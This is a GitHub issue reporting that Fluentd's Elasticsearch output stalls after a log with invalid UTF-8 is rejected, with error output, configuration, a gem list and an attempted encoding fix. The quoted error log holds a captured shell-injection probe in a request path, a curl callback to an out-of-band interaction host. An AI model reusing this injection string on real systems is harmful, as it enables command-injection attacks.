Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fluentd stops shipping logs to elasticsearch after hitting non UTF-8 character in log #1018

Open
danfinn opened this issue Jun 2, 2023 · 2 comments

Comments

@danfinn
Copy link

danfinn commented Jun 2, 2023

(check apply)

  • [ x] read the contribution guideline
  • [x ] (optional) already reported 3rd party upstream repository or mailing list if you use k8s addon or helm charts.

Problem

We've been facing some major issues in production lately that we have tracked down to several types of logs that are getting collected with non UT8 encoded characters. It seems like once fluentd hits one of these logs, all logs stop getting delivered to elasticsearch. Here is the error from one of the logs:

2023-06-02 15:35:26 +0000 [trace]: #0 [out_es] chunk taken back instance=51660 chunk_id="5fd268b35b2a9112985c10fd584d2aed" metadata=#<struct Fluent::Plugin::Buffer::Metadata timekey=nil, tag="kubernetes.var.log.   containers.nginx-ingress-ingress-nginx-controller-757ddbc8fd-x8nmx_gateway_controller-da786ea0839b545cfcfc75a8ff585dfecd7af1525299d41719902d558b9e6177.log", variables=nil, seq=0>
 2023-06-02 15:35:26 +0000 [warn]: #0 [out_es] failed to flush the buffer. retry_times=101 next_retry_time=2023-06-02 15:35:57 +0000 chunk="5fd268b35b2a9112985c10fd584d2aed" error_class=Fluent::Plugin::             ElasticsearchOutput::RecoverableRequestFailure error="could not push logs to Elasticsearch cluster ({:host=>\"elastic.domain.com\", :port=>9200, :scheme=>\"https\", :user=>\"prod-fluentd-daemonset\", :password=>\"obfuscated\", :path=>\"\"}): [400] {\"error\":{\"root_cause\":[{\"type\":\"parse_exception\",\"reason\":\"Failed to parse content to map\"}],\"type\":\"parse_exception\",  \"reason\":\"Failed to parse content to map\",\"caused_by\":{\"type\":\"json_parse_exception\",\"reason\":\"Invalid UTF-8 middle byte 0x7f\\n at [Source: (byte[])\\\"{\\\"@timestamp\\\":\\\"2023-06-02T14:42:16+00: 00\\\",\\\"remote_addr\\\":\\\"89.116.25.154\\\",\\\"x-forward-for\\\":\\\"89.116.25.154\\\",\\\"request_id\\\":\\\"c27eea84167b098addcc3ccc4a575a0d\\\",\\\"remote_user\\\":\\\"\\\",\\\"bytes_sent\\\":1083,        \\\"request_time\\\":0.003,\\\"status\\\":403,\\\"vhost\\\":\\\"collaboration.domain.com\\\",\\\"request_proto\\\":\\\"HTTP/1.1\\\",\\\"path\\\":\\\"/                                            \\\\u0004\uFFFD\\\\u007F\uFFFD\\\\u0018\uFFFD\\\\u007F\uFFFD\\\\u0018\uFFFD\\\\u007F\uFFFDd\uFFFD\\\\u0006\\\\b;{curl,http:/chqgu8aaibnbbla4dcggfwb61io33zwdm.oast.pro+-H+'User-Agent:+lMKrrg'};                      \\\\u0004\uFFFD\\\\u007F\uFFFD\\\\u0018\uFFFD\\\\u007F\uFFFD\\\\u0018\uFFFD\\\\u007F\uFFFDd\uFFFD\\\\u0006\\\\b;{curl,http:/chqgu8aaibnbbla4dcgg\\\"[truncated 2173 bytes]; line: 1, column: 321]\"}},\"status\":     400}"
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluent-plugin-elasticsearch-5.3.0/lib/fluent/plugin/out_elasticsearch.rb:1148:in `rescue in send_bulk'
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluent-plugin-elasticsearch-5.3.0/lib/fluent/plugin/out_elasticsearch.rb:1110:in `send_bulk'
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluent-plugin-elasticsearch-5.3.0/lib/fluent/plugin/out_elasticsearch.rb:886:in `block in write'
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluent-plugin-elasticsearch-5.3.0/lib/fluent/plugin/out_elasticsearch.rb:885:in `each'
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluent-plugin-elasticsearch-5.3.0/lib/fluent/plugin/out_elasticsearch.rb:885:in `write'
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluentd-1.16.1/lib/fluent/plugin/output.rb:1225:in `try_flush'
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluentd-1.16.1/lib/fluent/plugin/output.rb:1538:in `flush_thread_run'
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluentd-1.16.1/lib/fluent/plugin/output.rb:510:in `block (2 levels) in start'
   2023-06-02 15:35:26 +0000 [warn]: #0 /usr/local/lib/ruby/gems/3.1.0/gems/fluentd-1.16.1/lib/fluent/plugin_helper/thread.rb:78:in `block in thread_create'

This then goes into a loop of trying to deliver this forever. I think we probably have an issue here with these logs that we aren't sure yet how to fix (open to suggestions) but the issue we are seeing with fluentd is that all logs stop shipping to elasticsearch once fluentd goes into this state. We can see buffer chunks building on the fluentd pod but never getting delivered.

Here is our config:

     <match **>
        @type elasticsearch
        @id out_es
        @log_level "#{ENV['FLUENT_LOG_LEVEL'] || 'TRACE' }"
        include_tag_key true
        suppress_type_name true
        hosts "#{ENV['FLUENT_ELASTICSEARCH_HOSTS'] || 'elasticsearch:9200' }"
        path "#{ENV['FLUENT_ELASTICSEARCH_PATH']}"
        scheme "#{ENV['FLUENT_ELASTICSEARCH_SCHEME'] || 'http'}"
        ssl_verify "#{ENV['FLUENT_ELASTICSEARCH_SSL_VERIFY'] || 'true'}"
        ssl_version "#{ENV['FLUENT_ELASTICSEARCH_SSL_VERSION'] || 'TLSv1_2'}"
        default_elasticsearch_version "#{ENV['FLUENT_ELASTICSEARCH_VRSN'] || '7'}"
        user "#{ENV['FLUENT_ELASTICSEARCH_USER'] || use_default}"
        password "#{ENV['FLUENT_ELASTICSEARCH_PASSWORD'] || use_default}"
        reload_connections "#{ENV['FLUENT_ELASTICSEARCH_RELOAD_CONNECTIONS'] || 'false'}"
        reconnect_on_error "#{ENV['FLUENT_ELASTICSEARCH_RECONNECT_ON_ERROR'] || 'true'}"
        reload_on_failure "#{ENV['FLUENT_ELASTICSEARCH_RELOAD_ON_FAILURE'] || 'true'}"
        log_es_400_reason "#{ENV['FLUENT_ELASTICSEARCH_LOG_ES_400_REASON'] || 'false'}"
        logstash_prefix "#{ENV['FLUENT_ELASTICSEARCH_LOGSTASH_PREFIX'] || 'logstash'}"
        logstash_dateformat "#{ENV['FLUENT_ELASTICSEARCH_LOGSTASH_DATEFORMAT'] || '%Y.%m.%d'}"
        logstash_format "#{ENV['FLUENT_ELASTICSEARCH_LOGSTASH_FORMAT'] || 'true'}"
        index_name "#{ENV['FLUENT_ELASTICSEARCH_LOGSTASH_INDEX_NAME'] || 'logstash'}"
        target_index_key "#{ENV['FLUENT_ELASTICSEARCH_TARGET_INDEX_KEY'] || use_nil}"
        type_name "#{ENV['FLUENT_ELASTICSEARCH_LOGSTASH_TYPE_NAME'] || 'fluentd'}"
        include_timestamp "#{ENV['FLUENT_ELASTICSEARCH_INCLUDE_TIMESTAMP'] || 'false'}"
        template_name "#{ENV['FLUENT_ELASTICSEARCH_TEMPLATE_NAME'] || use_nil}"
        template_file "#{ENV['FLUENT_ELASTICSEARCH_TEMPLATE_FILE'] || use_nil}"
        template_overwrite "#{ENV['FLUENT_ELASTICSEARCH_TEMPLATE_OVERWRITE'] || use_default}"
        request_timeout "#{ENV['FLUENT_ELASTICSEARCH_REQUEST_TIMEOUT'] || '120s'}"
        application_name "#{ENV['FLUENT_ELASTICSEARCH_APPLICATION_NAME'] || use_default}"
        enable_ilm "#{ENV['FLUENT_ELASTICSEARCH_ENABLE_ILM'] || 'false'}"
        customize_template "#{ENV['FLUENT_ELASTICSEARCH_CUSTOMIZE_TEMPLATE'] || use_default}"
        rollover_index "#{ENV['FLUENT_ELASTICSEARCH_ROLLOVER_INDEX'] || 'false'}"
        index_date_pattern "#{ENV['FLUENT_ELASTICSEARCH_ROLLOVER_INDEX'] || 'now/d'}"
        ilm_policy_id "#{ENV['FLUENT_ELASTICSEARCH_ILM_POLICY_ID'] || use_default}"
        ilm_policy "#{ENV['FLUENT_ELASTICSEARCH_ILM_POLICY'] || use_default}"
        ilm_policy_overwrite "#{ENV['FLUENT_ELASTICSEARCH_ILM_POLICY_OVERWRITE'] || 'false'}"
        pipeline fluentd_logs
       <buffer>
           @type file
           path  /fluentd/log/elastic-buffer
           flush_thread_count 8
           flush_interval 15s
           chunk_limit_size 32MB
           queue_limit_length 4
           flush_mode interval
           retry_max_interval 30
           retry_forever true
         </buffer>
     </match>

Is there a way to force UTF-8 encoding in this plugin?

Because of this we've gotten into a very unstable state with fluentd and are constantly seeing instabilities and issues with it in our production environment. Any help would be much appreciated.

Steps to replicate

Either clone and modify https://gist.github.com/pitr/9a518e840db58f435911

OR

Provide example config and message

Expected Behavior or What you need to ask

fluentd to continue to process logs after a log gets rejected
...

Using Fluentd and ES plugin versions

FROM fluent/fluentd:v1.15-debian-1
k8s

fluent-gem list

*** LOCAL GEMS ***

abbrev (default: 0.1.0)
addressable (2.8.4)
async (1.30.3)
async-http (0.56.6)
async-io (1.34.3)
async-pool (0.3.12)
azure-storage-blob (2.0.3)
azure-storage-common (2.0.4)
base64 (default: 0.1.1)
benchmark (default: 0.2.0)
bigdecimal (default: 3.1.1)
bundler (default: 2.3.26)
cgi (default: 0.3.5)
concurrent-ruby (1.2.2, 1.2.0)
connection_pool (2.4.0)
console (1.16.2)
cool.io (1.7.1)
csv (default: 3.2.5)
date (default: 3.2.2)
debug (1.6.3)
delegate (default: 0.2.0)
did_you_mean (default: 1.6.1)
digest (default: 3.1.0)
domain_name (0.5.20190701)
drb (default: 2.1.0)
elastic-transport (8.2.1)
elasticsearch (8.6.0)
elasticsearch-api (8.6.0)
english (default: 0.7.1)
erb (default: 2.2.3)
error_highlight (default: 0.3.0)
etc (default: 1.3.0)
excon (0.99.0)
faraday (2.7.4, 1.10.0)
faraday-em_http (1.0.0)
faraday-em_synchrony (1.0.0)
faraday-excon (2.1.0, 1.1.0)
faraday-httpclient (1.0.1)
faraday-multipart (1.0.4)
faraday-net_http (3.0.2, 1.0.1)
faraday-net_http_persistent (1.2.0)
faraday-patron (1.0.0)
faraday-rack (1.0.0)
faraday-retry (1.0.3)
faraday_middleware (1.2.0)
fcntl (default: 1.0.1)
ffi (1.15.5)
ffi-compiler (1.0.1)
fiber-local (1.0.0)
fiddle (default: 1.1.0)
fileutils (default: 1.6.0)
find (default: 0.1.1)
fluent-config-regexp-type (1.0.0)
fluent-plugin-azure-storage-append-blob (0.2.1)
fluent-plugin-concat (2.5.0)
fluent-plugin-dedot_filter (1.0.0)
fluent-plugin-detect-exceptions (0.0.15)
fluent-plugin-elasticsearch (5.3.0)
fluent-plugin-grok-parser (2.6.2)
fluent-plugin-json-in-json-2 (1.0.2)
fluent-plugin-kubernetes_metadata_filter (3.2.0)
fluent-plugin-multi-format-parser (1.0.0)
fluent-plugin-parser-cri (0.1.1)
fluent-plugin-prometheus (2.0.3)
fluent-plugin-record-modifier (2.1.1)
fluent-plugin-rewrite-tag-filter (2.4.0)
fluent-plugin-systemd (1.0.5)
fluentd (1.16.1, 1.15.3)
forwardable (default: 1.3.2)
getoptlong (default: 0.1.1)
http (5.1.1)
http-accept (1.7.0)
http-cookie (1.0.5)
http-form_data (2.3.0)
http_parser.rb (0.8.0)
io-console (default: 0.5.11)
io-nonblock (default: 0.1.0)
io-wait (default: 0.2.1)
ipaddr (default: 1.2.4)
irb (default: 1.4.1)
json (2.6.3, default: 2.6.1)
jsonpath (1.1.3)
kubeclient (4.11.0)
llhttp-ffi (0.4.0)
logger (default: 1.5.0)
lru_redux (1.1.0)
matrix (0.4.2)
mime-types (3.4.1)
mime-types-data (3.2023.0218.1)
minitest (5.15.0)
msgpack (1.7.0, 1.6.0)
multi_json (1.15.0)
multipart-post (2.3.0)
mutex_m (default: 0.1.1)
net-ftp (0.1.3)
net-http (default: 0.3.0)
net-http-persistent (4.0.2)
net-imap (0.2.3)
net-pop (0.1.1)
net-protocol (default: 0.1.2)
net-smtp (0.3.1)
netrc (0.11.0)
nio4r (2.5.8)
nkf (default: 0.1.1)
nokogiri (1.15.0 x86_64-linux)
observer (default: 0.1.1)
oj (3.14.2)
open-uri (default: 0.2.0)
open3 (default: 0.1.1)
openssl (default: 3.0.1)
optparse (default: 0.2.0)
ostruct (default: 0.5.2)
pathname (default: 0.2.0)
power_assert (2.0.1)
pp (default: 0.3.0)
prettyprint (default: 0.1.1)
prime (0.1.2)
prometheus-client (4.1.0)
protocol-hpack (1.4.2)
protocol-http (0.22.9)
protocol-http1 (0.14.6)
protocol-http2 (0.14.2)
pstore (default: 0.1.1)
psych (default: 4.0.4)
public_suffix (5.0.1)
racc (default: 1.6.0)
rake (13.0.6)
rbs (2.7.0)
rdoc (default: 6.4.0)
readline (default: 0.0.3)
readline-ext (default: 0.1.4)
recursive-open-struct (1.1.3)
reline (default: 0.3.1)
resolv (default: 0.2.1)
resolv-replace (default: 0.1.0)
rest-client (2.1.0)
rexml (3.2.5)
rinda (default: 0.1.1)
rss (0.2.9)
ruby2_keywords (default: 0.0.5)
securerandom (default: 0.2.0)
serverengine (2.3.2, 2.3.1)
set (default: 1.0.2)
shellwords (default: 0.1.0)
sigdump (0.2.4)
singleton (default: 0.1.1)
stringio (default: 3.0.1)
strptime (0.2.5)
strscan (default: 3.0.1)
syslog (default: 0.1.0)
systemd-journal (1.4.2)
tempfile (default: 0.1.2)
test-unit (3.5.3)
time (default: 0.2.0)
timeout (default: 0.2.0)
timers (4.3.5)
tmpdir (default: 0.1.2)
traces (0.4.1)
tsort (default: 0.1.0)
typeprof (0.21.3)
tzinfo (2.0.6)
tzinfo-data (1.2023.3, 1.2022.7)
un (default: 0.2.0)
unf (0.1.4)
unf_ext (0.0.8.2)
uri (default: 0.11.0)
weakref (default: 0.1.1)
webrick (1.8.1, 1.7.0)
yajl-ruby (1.4.3)
yaml (default: 0.2.0)
zlib (default: 2.1.1)

Elasticsearch 8.7.0

@danfinn
Copy link
Author

danfinn commented Jun 2, 2023

We did try adding:

     <filter **>
       @type record_modifier
       char_encoding ISO-8859-1:utf-8
       char_encoding utf-8
     </filter>

to our config but that seems not have made any difference, we are still seeing the same issue.

@rmawhinnie
Copy link

watching

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants